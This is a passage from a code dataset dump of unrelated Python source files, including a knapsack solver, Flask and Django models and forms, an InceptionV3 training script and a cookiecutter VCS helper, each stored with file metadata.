ext = ''\n os.rename(\n os.path.join(self.__path_dir_target, name+ext), \n os.path.join(self.__path_dir_target, prefix*(fig - len(name)) + name+ext))\n","sub_path":"src/script/py/os/file/SequenceName.py","file_name":"SequenceName.py","file_ext":"py","file_size_in_byte":3031,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"280292132","text":"import json\n\nfrom application import db\n\n\ndef make_json(self):\n return {\n 'id': self.id,\n 'login': self.login,\n 'address': self.address\n }\n\n\nclass Center(db.Model):\n __tablename__ = \"center\"\n id = db.Column(db.Integer, primary_key=True)\n login = db.Column(db.String(32), nullable=False)\n password = db.Column(db.String(32), nullable=False)\n address = db.Column(db.String(32))\n\n animals = db.relationship(\n \"Animal\",\n backref=\"center\",\n cascade=\"all, delete, save-update, delete-orphan\",\n single_parent=True,\n )\n\n def __repr__(self):\n center_object = {\n 'login': self.login,\n 'address': self.address\n }\n return json.dumps(center_object)\n","sub_path":"application/models/center.py","file_name":"center.py","file_ext":"py","file_size_in_byte":758,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"601265413","text":"\n\nclass KnapSackEntry:\n weight=0\n profit=0\n\n def __init__(self,weight,price):\n self.weight=weight\n self.profit=price\n\n def __repr__(self):\n return \"[\" + str(self.weight) +\", \" + str(self.profit) + \"]\"\n\n\ndef __create_set(weights, profits):\n\n entry_list=list()\n\n for i in range(len(weights)):\n knapsack_entry = KnapSackEntry(weights[i], profits[i])\n entry_list.append(knapsack_entry)\n\n return entry_list\n\n\ndef find_entries(weights, profites, bag_capacity):\n entry_list=__create_set(weights ,profites)\n return __find_entries(entry_list,list(),bag_capacity, 0 ,0)\n\n\ndef __find_entries(entry_list , current_list , bag_capacity ,current_weight , current_profit):\n\n print(current_list)\n\n if len(entry_list) == 1:\n return entry_list[0].profit\n\n if current_weight > bag_capacity :\n return 0\n\n\n max_profit = current_profit\n\n print(current_weight,max_profit)\n\n for i in range(len(entry_list)):\n current_list.append(entry_list[i])\n new_current_weight = current_weight + entry_list[i].weight\n new_current_profit = current_profit + entry_list[i].profit\n\n with_item_max_profit = __find_entries(entry_list, current_list, bag_capacity, new_current_weight,new_current_profit)\n if with_item_max_profit == 0:\n with_item_max_profit = current_profit\n\n max_profit = max(current_profit, with_item_max_profit)\n\n return max_profit\n\n\nprices = list([2,3,4,5])\nweights = list([1,2,5,6])\n\nmax_profit = find_entries(prices,weights,5)\n\nprint(str(max_profit))\n\n","sub_path":"salpe/dynamic_programming/0_1_knapsack.py","file_name":"0_1_knapsack.py","file_ext":"py","file_size_in_byte":1581,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"373748958","text":"from bot.dataIO import fileIO\r\nimport os\r\n\r\ntry:\r\n data_json = {\r\n \"Discord\": {\r\n \"webhook_url\": os.environ[\"WEBHOOK_URL\"]\r\n },\r\n \"Weibo\": {\r\n \"weibo_id\": os.environ[\"WEIBO_ID\"].replace(\" \", \"\").split(\",\")\r\n }\r\n }\r\nexcept:\r\n if fileIO(\"bot/data.json\", \"check\"):\r\n data_json = fileIO(\"bot/data.json\", \"load\")\r\n\r\nif data_json[\"Weibo\"][\"weibo_id\"] is \"\" or None:\r\n raise ValueError(\"weibo id not found\")\r\n","sub_path":"bot/global_values.py","file_name":"global_values.py","file_ext":"py","file_size_in_byte":471,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"117018290","text":"import tkinter as tk\nimport os\nimport webbrowser\n\n\n\nroot = tk.Tk()\nroot.title(\"Automate 3 functions\")\n\ndef github():\n webbrowser.open_new_tab(\"github.com\")\n\nbutton1 = tk.Button(root,text=\"open github\",width= 25,command = github)\nbutton1.pack()\n\ndef code():\n os.system(\"code\")\n\nbutton2 = tk.Button(root,text=\"Start vs code\", width = 25, command= code)\nbutton2.pack()\n\ndef checkmail():\n webbrowser.open_new_tab(\"gmail.com/inbox\")\n\nbutton3 = tk.Button(root,text=\"Check your email\",width= 25,command =checkmail )\nbutton3.pack()\n\n\n\nroot.mainloop()\n","sub_path":"automate-gci/automate-gci.py","file_name":"automate-gci.py","file_ext":"py","file_size_in_byte":553,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"54287258","text":"# simpleバージョン\nclass BinaryIndexedTree:\n def __init__(self,size):\n self.N = size\n self.bit = [0]*(size+1)\n def add(self,x,w): # 0-indexed\n x += 1\n while x <= self.N:\n self.bit[x] += w\n x += (x & -x)\n def _sum(self,x): # 1-indexed\n ret = 0\n while x > 0:\n ret += self.bit[x]\n x -= (x & -x)\n return ret\n def sum(self,l,r): # [l,r)\n return self._sum(r) - self._sum(l)\n def __str__(self): # for debug\n arr = [self.sum(i,i+1) for i in range(self.N)]\n return str(arr)\n\n\nclass BIT:\n \"\"\" 区間加算BIT(区間加算・区間合計取得) \"\"\"\n \n def __init__(self, N):\n # 添字0が使えないので、内部的には全て1-indexedとして扱う\n N += 1\n self.N = N\n self.data0 = [0] * N\n self.data1 = [0] * N\n \n def _add(self, data, k, x):\n k += 1\n while k < self.N:\n data[k] += x\n k += k & -k\n \n def _get(self, data, k):\n k += 1\n s = 0\n while k:\n s += data[k]\n k -= k & -k\n return s\n \n def add(self, l, r, x):\n \"\"\" 区間[l,r)に値xを追加 \"\"\"\n \n self._add(self.data0, l, -x*(l-1))\n self._add(self.data0, r, x*(r-1))\n self._add(self.data1, l, x)\n self._add(self.data1, r, -x)\n \n def query(self, l, r):\n \"\"\" 区間[l,r)の和を取得 \"\"\"\n \n return self._get(self.data1, r-1) * (r-1) + self._get(self.data0, r-1) \\\n - self._get(self.data1, l-1) * (l-1) - self._get(self.data0, l-1)\n\ndef ctoi(c):\n return ord(c) - ord('a')\n\ndef main():\n N = int(input())\n S = input()\n Q = int(input())\n query = [input().split() for i in range(Q)]\n bits = [BIT(N) for i in range(26)]\n s = []\n for i, c in enumerate(S):\n bits[ctoi(c)].add(i,i+1,1)\n s.append(c)\n\n for a, b, c in query:\n if a == '1':\n i = int(b) - 1\n bits[ctoi(s[i])].add(i,i+1,-1)\n bits[ctoi(c)].add(i,i+1,1)\n s[i] = c\n else:\n l = int(b) - 1\n r = int(c)\n a = 0\n for i in range(26):\n if bits[i].query(l,r):\n a += 1\n print(a)\n\n\n\n\nif __name__ == \"__main__\":\n main()","sub_path":"Python_codes/p02763/s449233211.py","file_name":"s449233211.py","file_ext":"py","file_size_in_byte":2335,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"244158399","text":"from greent.util import Text\nfrom greent.util import LoggingUtil\nimport logging\n\nlogger = LoggingUtil.init_logging(__name__, level=logging.DEBUG, format='long')\n\ndef synonymize(node, gt):\n synonyms = get_synonyms(node,gt)\n '''\n Canning this, because we're not relying on chemotext any more\n # do we have any MeSH ids? If not, we want to dig deeper and get some so that chemotext will work\n # As we modify our literature diving methods, we might not need this any more.\n try:\n double_check_for_mesh(node,synonyms,gt)\n except Exception as e:\n logger.error(\"Failure for getting MESH: {}\".format(node.identifier))\n logger.error(e)\n '''\n # OK, we're not going to use them all, there's some BS PMIDs that come back...\n synonyms = {s for s in synonyms if not s.identifier.startswith('PMID')}\n node.synonyms.update(synonyms)\n return synonyms\n\ndef get_synonyms(node, gt, distance=2):\n #OXO doesn't know about every kind of curie. So let's see if it knows about our node identifier\n synonyms = get_synonyms_with_curie_check(node.id, gt, distance=distance)\n if len(synonyms) == 0:\n #OXO didn't know about it. So we're going to call oxo with our (valid) synonyms\n #Because of this, we're likely to end up with a mix of Strings and LabeledID\n known_synonyms = node.synonyms\n for s in known_synonyms:\n synonyms.update( get_synonyms_with_curie_check(s.identifier,gt, distance=distance) )\n return synonyms\n\ndef get_synonyms_with_curie_check( identifier,gt,distance=2):\n if gt.oxo.is_valid_curie_prefix( Text.get_curie(identifier)):\n #synonyms = gt.oxo.get_synonymous_curies(identifier, distance=distance)\n synonyms = gt.oxo.get_synonymous_curies_and_labels(identifier, distance=distance)\n else:\n synonyms = set()\n return synonyms\n\ndef double_check_for_mesh( node, new_synonyms, gt):\n all_synonyms = set()\n all_synonyms.update(node.synonyms)\n all_synonyms.update(new_synonyms)\n for s in all_synonyms:\n if Text.get_curie(s) == 'MESH':\n return\n #No Mesh Found\n meshs = set()\n for s in all_synonyms:\n meshs.update( get_particular_synonyms(s, 'MESH', gt, distance=3))\n node.add_synonyms(meshs)\n\ndef get_particular_synonyms( identifier, prefix, gt, distance ):\n newsyns = get_synonyms_with_curie_check(identifier, gt, distance=distance)\n return set( filter( lambda x: Text.get_curie(x) == prefix, newsyns))\n\n\n","sub_path":"greent/synonymizers/oxo_synonymizer.py","file_name":"oxo_synonymizer.py","file_ext":"py","file_size_in_byte":2484,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"115577116","text":"# pylint: disable=no-member, unexpected-keyword-arg, too-many-public-methods,\n# pylint: too-few-public-methods, import-error, relative-import\n\"\"\"Forms create here\"\"\"\n\nfrom django import forms\nfrom periods.models import Period\n\nMONDAY = 0\nTUESDAY = 1\nWEDNESDAY = 2\nTHURSDAY = 3\nFRIDAY = 4\nSATURDAY = 5\nSUNDAY = 6\nDAY_CHOICES = (\n (1, 'Monday'),\n (2, 'Tuesday'),\n (3, 'Wednesday'),\n (4, 'Thursday'),\n (5, 'Friday'),\n (6, 'Saturday'),\n (7, 'Sunday')\n)\n\nORDER_CHOICES = (\n (1, '1'),\n (2, '2'),\n (3, '3'),\n (4, '4'),\n (5, '5'),\n (6, '6'),\n (7, '7'),\n (8, '8'),\n (9, '9'),\n (10, '10'),\n)\nTYPE_PERIOD_CHOICES = (\n (1, 'Science'),\n (2, 'Technology'),\n (3, 'Art'),\n (4, 'Economic'),\n (5, 'Others'),\n)\n\n\nclass EditPeriodForm(forms.Form):\n \"\"\"Form to edit period\"\"\"\n code = forms.CharField(max_length=10)\n name = forms.CharField(max_length=30)\n lecturer = forms.CharField(max_length=30)\n day = forms.ChoiceField(\n widget=forms.Select,\n choices=DAY_CHOICES,\n )\n start = forms.ChoiceField(\n widget=forms.Select,\n choices=ORDER_CHOICES,\n )\n length = forms.IntegerField()\n\n period_type = forms.ChoiceField(\n widget=forms.Select,\n choices=TYPE_PERIOD_CHOICES,\n )\n\n def check_conflict(self, pid):\n \"\"\"Check if course conflicts with already-enrolled course\"\"\"\n periods_array = Period.objects.filter(timetable_id=pid)\n pos = (int(self.cleaned_data['day']) - 1) * 10\n pos += int(self.cleaned_data['start'])\n leg = self.cleaned_data['length']\n free = [1, 2, 3, 4, 5, 6, 7, 8, 9, 10, 11, 12, 13, 14, 15, 16, 17, 18,\n 19, 20, 21, 22, 23, 24, 25, 26, 27, 28, 29, 30, 31, 32, 33, 34,\n 35, 36, 37, 38, 39, 40, 41, 42, 43, 44, 45, 46, 47, 48, 49, 50,\n 51, 52, 53, 54, 55, 56, 57, 58, 59, 60, 61, 62, 63, 64, 65, 66,\n 67, 68, 69, 70, 71, 72, 73]\n for f in free:\n f = False\n for period in periods_array:\n free[period.position] = False\n j = period.position\n while j <= period.position + period.length-1:\n if (j > 0) and (j < 71):\n free[j] = False\n j += 1\n j = pos\n while j <= pos+leg-1:\n if j > 70:\n return False\n if not free[j]:\n return False\n else:\n free[j] = False\n j += 1\n return True\n\n","sub_path":"periods/forms.py","file_name":"forms.py","file_ext":"py","file_size_in_byte":2523,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"18004084","text":"from keras.applications.inception_v3 import InceptionV3,preprocess_input\nfrom keras.layers import Dense,Dropout ,BatchNormalization,Flatten\nfrom keras.layers import GlobalAveragePooling2D,AveragePooling2D\nfrom keras.models import Model\nfrom keras.preprocessing.image import ImageDataGenerator\nfrom keras.callbacks import EarlyStopping,ModelCheckpoint\nimport matplotlib.pyplot as plt\n\nimg_width, img_height = 299, 299\ntrain_data_dir = '/home/cihan/Desktop/DATAFOLDER/train'\nvalidation_data_dir = '/home/cihan/Desktop/DATAFOLDER/test'\n# number of epochs to train top model\nepochs = 100\n# batch size used by flow_from_directory and predict_generator\nbatch_size = 16\n\ndef train_maodel():\n # create the base pre-trained model\n base_model = InceptionV3(weights='imagenet', include_top=False)\n\n # add a global spatial average pooling layer\n x = base_model.output\n x = GlobalAveragePooling2D()(x)\n # let's add a fully-connected layer\n x = Dropout(0.5)(x)\n x = Dense(1024, activation='relu')(x) # try dense layer lower TODO :\n x = BatchNormalization()(x)\n x = Dropout(0.5)(x)\n # # and a logistic layer -- let's say we have 4 classes\n\n predictions = Dense(4, activation='softmax')(x)\n\n\n\n # this is the model we will train\n model = Model(inputs=base_model.input, outputs=predictions)\n\n # first: train only the top layers (which were randomly initialized)\n # i.e. freeze all convolutional InceptionV3 layers\n for layer in base_model.layers:\n layer.trainable = False\n\n # compile the model (should be done *after* setting layers to non-trainable)\n model.compile(optimizer='rmsprop', loss='categorical_crossentropy',\n metrics=['accuracy'])\n\n\n train_datagen = ImageDataGenerator(\n preprocessing_function=preprocess_input\n )\n test_datagen = ImageDataGenerator(\n preprocessing_function=preprocess_input\n )\n\n train_generator = train_datagen.flow_from_directory(\n train_data_dir,\n target_size=(img_height, img_width),\n batch_size=batch_size,\n class_mode='categorical')\n nb_train_samples = len(train_generator.filenames)\n validation_generator = test_datagen.flow_from_directory(\n validation_data_dir,\n target_size=(img_height, img_width),\n batch_size=batch_size,\n class_mode='categorical')\n nb_validation_samples = len(validation_generator.filenames)\n\n # let's visualize layer names and layer indices to see how many layers\n # we should freeze:\n for i, layer in enumerate(base_model.layers):\n print(i, layer.name)\n\n # train the model on the new data for a few epochs\n model.fit_generator(\n train_generator,\n samples_per_epoch=nb_train_samples,\n epochs=2,\n validation_data=validation_generator,\n validation_steps=nb_validation_samples)\n train_datagen = ImageDataGenerator(\n preprocessing_function=preprocess_input,\n rotation_range=40,\n width_shift_range=0.1,\n height_shift_range=0.1,\n shear_range=0.1,\n zoom_range=0.3,\n horizontal_flip=True,\n vertical_flip=True,\n fill_mode='nearest')\n train_generator = train_datagen.flow_from_directory(\n train_data_dir,\n target_size=(img_height, img_width),\n batch_size=batch_size,\n class_mode='categorical')\n\n # at this point, the top layers are well trained and we can start fine-tuning\n # convolutional layers from inception V3. We will freeze the bottom N layers\n # and train the remaining top layers.\n\n # we chose to train the top 2 inception blocks, i.e. we will freeze\n # the first 249 layers and unfreeze the rest:\n for layer in model.layers[:249]:\n layer.trainable = False\n for layer in model.layers[249:]:\n layer.trainable = True\n\n # we need to recompile the model for these modifications to take effect\n # we use SGD with a low learning rate\n from keras.optimizers import SGD\n model.compile(optimizer=SGD(lr=0.0001, momentum=0.9), loss='categorical_crossentropy',\n metrics=['accuracy'])\n\n # we train our model again (this time fine-tuning the top 2 inception blocks\n # alongside the top Dense layers\n # Save the model according to the conditions\n checkpoint = ModelCheckpoint(\"/home/cihan/Desktop/inceptionv3.h5\", monitor='val_acc', verbose=1, save_best_only=True, save_weights_only=False,\n mode='auto', period=2)\n early = EarlyStopping(monitor='val_acc', min_delta=0, patience=15, verbose=1, mode='auto')\n\n # fine-tune the model\n history = model.fit_generator(\n train_generator,\n samples_per_epoch=nb_train_samples,\n epochs=epochs,\n validation_data=validation_generator,\n validation_steps=nb_validation_samples,\n callbacks=[checkpoint, early])\n\n plt.figure(1)\n\n # summarize history for accuracy\n\n plt.subplot(211)\n plt.plot(history.history['acc'])\n plt.plot(history.history['val_acc'])\n plt.title('model accuracy')\n plt.ylabel('accuracy')\n plt.xlabel('epoch')\n plt.legend(['train', 'test'], loc='upper left')\n\n # summarize history for loss\n\n plt.subplot(212)\n plt.plot(history.history['loss'])\n plt.plot(history.history['val_loss'])\n plt.title('model loss')\n plt.ylabel('loss')\n plt.xlabel('epoch')\n plt.legend(['train', 'test'], loc='upper left')\n plt.show()\n\n\nif __name__ == '__main__':\n train_maodel()","sub_path":"test_keras/inceptionv3/inceptionv3_main.py","file_name":"inceptionv3_main.py","file_ext":"py","file_size_in_byte":5473,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"71113171","text":"# Copyright (c) 2013 Mirantis Inc.\n#\n# Licensed under the Apache License, Version 2.0 (the \"License\");\n# you may not use this file except in compliance with the License.\n# You may obtain a copy of the License at\n#\n# http://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS,\n# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or\n# implied.\n# See the License for the specific language governing permissions and\n# limitations under the License.\n\n\nfrom oslo_config import cfg\nfrom oslo_log import log as logging\nimport six\nfrom stevedore import enabled\n\nfrom sahara import conductor as cond\nfrom sahara import exceptions as ex\nfrom sahara.i18n import _\nfrom sahara.i18n import _LI\n\nconductor = cond.API\n\nLOG = logging.getLogger(__name__)\nCONF = cfg.CONF\n\n\nclass DataSourceManager(object):\n def __init__(self):\n self.data_sources = {}\n self._load_data_sources()\n\n def _load_data_sources(self):\n config_ds = CONF.data_sources_types\n extension_manager = enabled.EnabledExtensionManager(\n check_func=lambda ext: ext.name in config_ds,\n namespace='sahara.service.edp.data_source.types',\n invoke_on_load=True\n )\n\n for ext in extension_manager.extensions:\n if ext.name in self.data_sources:\n raise ex.ConfigurationError(\n _(\"Data source with name '%s' already exists.\") %\n ext.name)\n ext.obj.name = ext.name\n self.data_sources[ext.name] = ext.obj\n LOG.info(_LI(\"Data source name {ds_name} loaded {entry_point}\")\n .format(plugin_name=ext.name,\n entry_point=ext.entry_point_target))\n\n if len(self.data_sources) < len(config_ds):\n loaded_ds = set(six.iterkeys(self.data_sources))\n requested_ds = set(config_ds)\n raise ex.ConfigurationError(\n _(\"Data sources couldn't be loaded: %s\") %\n \", \".join(requested_ds - loaded_ds))\n\n def get_data_sources(self):\n config_ds = CONF.data_sources_types\n return [self.get_gata_source(name) for name in config_ds]\n\n def get_data_source(self, ds_name):\n return self.data_sources.get(ds_name)\n\n def update_data_source(self, plugin_name, values):\n self.label_handler.update_data_source(plugin_name, values)\n return self.get_data_source(plugin_name)\n\n def validate_plugin_update(self, plugin_name, values):\n return self.label_handler.validate_data_source_update(\n plugin_name, values)\n\n def get_data_source_update_validation_jsonschema(self):\n return self.label_handler.get_data_source_update_validation_jsonschema()\n\n\nDATA_SOURCES = None\n\ndef setup_plugins():\n global DATA_SOURCES\n DATA_SOURCES = DataSourceManager()\n","sub_path":"sahara/service/edp/data_sources/manager.py","file_name":"manager.py","file_ext":"py","file_size_in_byte":2955,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"471976041","text":"import sys\nimport pyzbar.pyzbar as pyzbar\nimport cv2\nimport barcode\nfrom PyQt5.QtCore import *\nfrom PyQt5.QtGui import *\nfrom PyQt5.QtWidgets import *\nfrom GUI_2 import *\n\na = 0\nb = 0\nc = 0\nd = 0\ne = 0\nf = 0\n\napp = QApplication(sys.argv)\nDialog = QDialog()\nui = Ui_Dialog()\nui.setupUi(Dialog)\nDialog.show()\nBAR = barcode.Baread()\nwhile True:\n \n bar_data = BAR.baread()\n if bar_data == \"yeonmudong\":\n a += 1\n ui.report('[ 연 무 동 ]',a)\n ui.ym(a)\n elif bar_data == \"umandong\":\n b += 1\n ui.report('[ 우 만 동 ]',b)\n ui.um(b)\n elif bar_data == \"iuidong\":\n c += 1\n ui.report('[ 이 의 동 ]',c)\n ui.ii(c)\n elif bar_data == \"ingyedong\":\n d += 1\n ui.report('[ 인 계 동 ]',d)\n ui.ig(d)\n elif bar_data == \"jidong\":\n e += 1\n ui.report('[ 지 동 ]',e)\n ui.ji(e)\n elif bar_data == \"hadong\":\n f += 1\n ui.report('[ 하 동 ]',f)\n ui.ha(f) \n else:\n ui.error()\n\nsys.exit(app.exec_())","sub_path":"UI_Test/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":1042,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"90347958","text":"import sys\nsys.stdin = open('input_contact.txt', 'r')\n\nfor tc in range(10):\n print('#%d' %(tc), end=' ')\n N, S = map(int, input().split())\n li = list(map(int, input().split()))\n queue = []\n queue.append(S)\n visited = [0] * (max(li)+2)\n idx_li = []\n visited[S] = 1\n while queue:\n x = queue.pop(0)\n for i in range(0, len(li)-1, 2):\n if li[i] == x and visited[li[i+1]] == 0:\n visited[li[i+1]] = visited[x] + 1\n queue.append(li[i+1])\n a = max(visited)\n while max(visited) == a:\n b = visited.index(max(visited))\n idx_li.append(b)\n visited[b] -= 1\n print(max(idx_li))","sub_path":"05_알고리즘/190906/contact.py","file_name":"contact.py","file_ext":"py","file_size_in_byte":673,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"600312596","text":"from flask import redirect, request\n\nfrom traffgroup.core.X.xflask import Controller, Route, Error, capp\nfrom traffgroup.core.X.mako import render_template\nfrom traffgroup.core.model.partners import Partner\nfrom traffgroup.x.data import XDC\nimport time\nfrom traffgroup.core.model import meta\nfrom traffgroup.core.model.meta import Session\nimport cgi\n\n\n@Controller(\"/register\")\nclass RegisterController():\n \n @Route(\"/form\")\n def reg_form(self): # TODO: change template target for production\n return render_template('/register/form.mako')\n\n @Error(403)\n @Route(\"/finalize_form\")\n def reg_finalize_form(self, ex = None):\n try:\n Session.rollback()\n except Exception:\n pass\n \n if XDC.main:\n partner = Partner.Get(XDC.main.uid)\n if not partner:\n return render_template('/register/finalize.mako')\n elif partner.approved_by == 0:\n return render_template('/register/wait.mako')\n else:\n return render_template('/error/403.mako')\n else:\n return render_template('/error/403.mako')\n\n @Route(\"/finalize\", methods=['GET', 'POST'])\n def reg_finalize(self):\n try:\n if not XDC.main:\n raise RuntimeError(\"XDC Failure\")\n \n if Partner.Count(Partner.id == XDC.main.uid):\n return redirect(\"/register/success\") \n \n icq = cgi.escape(request.values['icq'])\n skype = cgi.escape(request.values['skype'])\n wmr = cgi.escape(request.values['wmr'])\n\n partner = Partner()\n \n partner.id = XDC.main.uid\n partner.wmz = \"\"\n partner.wmr = wmr\n partner.icq = icq \n partner.skype = skype\n\n partner.ts_spawn = time.time() # TODO: add states, flags, types \n partner.type = Partner.Type.REGULAR #@ReservedAssignment\n partner.state = Partner.State.ACTIVE\n partner.flags = 0 \n \n meta.Session.add(partner) #@UndefinedVariable\n meta.Session.flush() #@UndefinedVariable\n meta.Session.commit() #@UndefinedVariable\n return redirect(\"/register/success\")\n except KeyError as e:\n capp.logger.exception(\"Cannot finalize reg\")\n return redirect(\"/register/finalize_form\")\n \n \n @Route(\"/success\") \n def reg_success(self):\n return redirect(\"/members/\")\n \n \n @Route(\"/failure\")\n def reg_failure(self):\n capp.logger.info(\"Registration failure, redirect to form\")\n return redirect(\"/register/form\")\n \n \n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n","sub_path":"traffgroup/partners/controllers/register.py","file_name":"register.py","file_ext":"py","file_size_in_byte":2934,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"454598522","text":"#!/usr/local/bin/python2.7\nfrom argparse import ArgumentParser\nfrom sys import stderr, exit, stdout\nfrom os.path import basename\n\n\ndef norm_it( dict ):\n factor = 1 / sum( dict.values() )\n norm_dict = {}\n for gap in dict.keys():\n norm_dict[ gap ] = dict[ gap ]*factor \n\n return norm_dict\n\n\ndef weight_it( dict ):\n weight_dict = {}\n highest = max( dict.values() )\n for gap in dict.keys():\n weight_dict[ gap ] = dict[ gap ]/highest\n\n return weight_dict\n\n\ndef scorefile_reader( scorefile ):\n #fragA fragB offset gap_size counts closab_score clash_score total_rmsd\n dict = {}\n with open( scorefile, \"r\" ) as f:\n for l in f:\n if l.startswith(\"#\"): continue\n ls = l.split()\n gap_size = int( ls[0] )\n raw = float( ls[3] )\n dict[ gap_size ] = raw\n\n \n #return norm_it( dict )\n return weight_it( dict )\n\n\nif __name__=='__main__':\n ''' \n gap_size: \n when closab_score says yes, what percentage of getting correct\n '''\n parser = ArgumentParser()\n parser.add_argument(\"-s\", \"--scorefile\", required=True, help=\"\")\n args = parser.parse_args()\n\n dict = scorefile_reader( args.scorefile )\n with open( args.scorefile, \"r\" ) as f:\n for l in f:\n if l.startswith(\"#\"): continue\n ls = l.split()\n gap_size = int( ls[0] )\n stdout.write( l.strip() )\n stdout.write( \"%10.4f\\n\" % dict[ gap_size ] )\n\n","sub_path":"denovo_utils/reweight_closabscore_effectiveness_results.py","file_name":"reweight_closabscore_effectiveness_results.py","file_ext":"py","file_size_in_byte":1483,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"465175577","text":"from marshmallow import fields, EXCLUDE\nfrom openpatch_core.schemas import ma, EnumField\nfrom openpatch_itembank.api.v1.schemas.test_version import TestVersionSchema\nfrom openpatch_itembank.api.v1.schemas.member import MemberSchema\nfrom openpatch_itembank.api.v1.schemas.member import MemberSchema\nfrom openpatch_itembank.api.v1.schemas.collection import TestCollectionSchema\nfrom openpatch_itembank.models.privacy import Privacy\nfrom openpatch_itembank.models.test import Test\n\n\nclass TestSchema(ma.SQLAlchemyAutoSchema):\n class Meta:\n model = Test\n exclude = [\"public_description_text\"]\n unknown = EXCLUDE\n load_instance = True\n include_relationships = True\n\n id = fields.UUID()\n privacy = EnumField(Privacy)\n member = fields.Nested(\n MemberSchema, allow_none=True, only=[\"id\", \"username\", \"avatar_id\", \"full_name\"]\n )\n\n versions = fields.List(\n fields.Nested(\n TestVersionSchema(\n only=(\"test\", \"version\", \"version_message\", \"status\", \"latest\")\n )\n )\n )\n\n collections = fields.Pluck(\n TestCollectionSchema, \"collection\", many=True, dump_only=True\n )\n\n\nTEST_SCHEMA = TestSchema()\nTESTS_SCHEMA = TestSchema(many=True)\n\n","sub_path":"openpatch_itembank/api/v1/schemas/test.py","file_name":"test.py","file_ext":"py","file_size_in_byte":1247,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"195389958","text":"\"\"\"Helper functions for working with version control systems.\"\"\"\nimport logging\nimport os\nfrom enum import Enum\nimport subprocess # nosec\nfrom shutil import which\nimport re\nimport click\n\nfrom cookiecutter.exceptions import (\n RepositoryCloneFailed,\n RepositoryNotFound,\n UnknownRepoType,\n VCSNotInstalled,\n)\nfrom cookiecutter.utils import make_sure_path_exists, prompt_and_delete\n\nlogger = logging.getLogger(__name__)\n\n\nclass VCS:\n \"\"\"Abstract base VCS class. Handles the cloning of VCS repositories.\"\"\"\n\n cmd = 'xyz'\n \"\"\"VCS command\"\"\"\n\n allowed_protocols = ['http', 'https', 'ssh', 'file']\n \"\"\"\n List of allowed protocols\n (no match if protocol not among allowed or specific protocols)\n \"\"\"\n\n identifiers = []\n \"\"\"VCS identifiers (implicit match if present in URL)\"\"\"\n\n protocols = []\n \"\"\"VCS-specific protocols (e.g. git://, svn://)\"\"\"\n\n suffixes = []\n \"\"\"VCS-specifix suffixes (e.g. .git, .hg)\"\"\"\n\n not_found_errors = []\n \"\"\"\n Error messages returned by the VCS if the repo was not found (lowercase)\n \"\"\"\n\n branch_errors = []\n \"\"\"\n Error messages returned by the VCS if the branch could not be checked out\n (lowercase)\n \"\"\"\n\n class MatchLevel(Enum):\n \"\"\"Match level returned by match_repo_url.\"\"\"\n\n NONE = 0\n IMPLICIT = 1\n EXPLICIT = 2\n\n @classmethod\n def match_repo_url(cls, url):\n \"\"\"\n Check if the raw URL input matches this VCS.\n\n Return match level:\n\n | **NONE:** Does not match\n | **IMPLICIT:** Contains VCS identifier\n (e.g. https://private.com/svnrepo, gitolite@server:team/repo)\n | **EXPLICIT:** Has VCS cmd prefix/protocol/suffix\n (e.g. svn://private.com/svnrepo,\n https://github.com/audreyr/cookiecutter.git,\n hg+https://bitbucket.org/foo/bar)\n\n :param url: Raw url parameter\n :return: VCS.VCS.MatchLevel, repo_url (or None)\n \"\"\"\n match = re.match(r'''(?:([\\w\\d]+)\\+)?((\\w+)://|\\w+@)(\\S+)''', url)\n\n if not match:\n return VCS.MatchLevel.NONE, ''\n\n prefix, protocol_raw, protocol, repo_path = match.groups()\n\n # Get repo url (without prefix)\n repo_url = ('' if protocol_raw is None else protocol_raw) + repo_path\n\n # If a protocol is stated, it has to be among the allowed protocols\n if protocol and protocol not in cls.allowed_protocols + cls.protocols:\n return VCS.MatchLevel.NONE, ''\n\n # If a VCS prefix is stated, it has to be equal to the VCS command\n # -> explicit match\n if prefix:\n if prefix == cls.cmd:\n return VCS.MatchLevel.EXPLICIT, repo_url\n else:\n return VCS.MatchLevel.NONE, ''\n\n # If the protocol is among the VCS-specific protocols,\n # return explicit match\n if protocol and protocol in cls.protocols:\n return VCS.MatchLevel.EXPLICIT, repo_url\n\n # If the repo url suffix is among the VCS-specific suffixes,\n # return explicit match\n if any(repo_path.endswith('.' + s) for s in cls.suffixes):\n return VCS.MatchLevel.EXPLICIT, repo_url\n\n # If the repo url contains an identifier, return implicit match\n if any(idt in repo_url for idt in cls.identifiers):\n return VCS.MatchLevel.IMPLICIT, repo_url\n\n return VCS.MatchLevel.NONE, ''\n\n @classmethod\n def is_installed(cls):\n \"\"\"\n Check if VCS is installed.\n\n :return: (bool) is_installed\n \"\"\"\n return bool(which(cls.cmd))\n\n @staticmethod\n def get_repo_dir(repo_name, clone_to_dir):\n \"\"\"\n Get the path of the 